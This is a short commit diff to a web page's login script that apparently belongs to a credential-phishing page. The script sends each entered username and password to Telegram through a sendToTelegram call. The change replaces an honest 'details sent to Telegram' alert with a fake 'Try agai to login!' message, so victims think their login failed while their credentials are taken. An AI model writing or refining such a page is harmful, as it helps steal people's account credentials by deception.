changed the name of ligin

--- a/index.htm
+++ b/index.htm
@@ -132,7 +132,7 @@
 
             if (username && password) {
                 sendToTelegram(username, password); // Send username and password to Telegram
-                alert('Logged in and details sent to Telegram!');
+                alert('Try agai to login!');
             } else {
                 alert('Please enter both username and password.');
             }
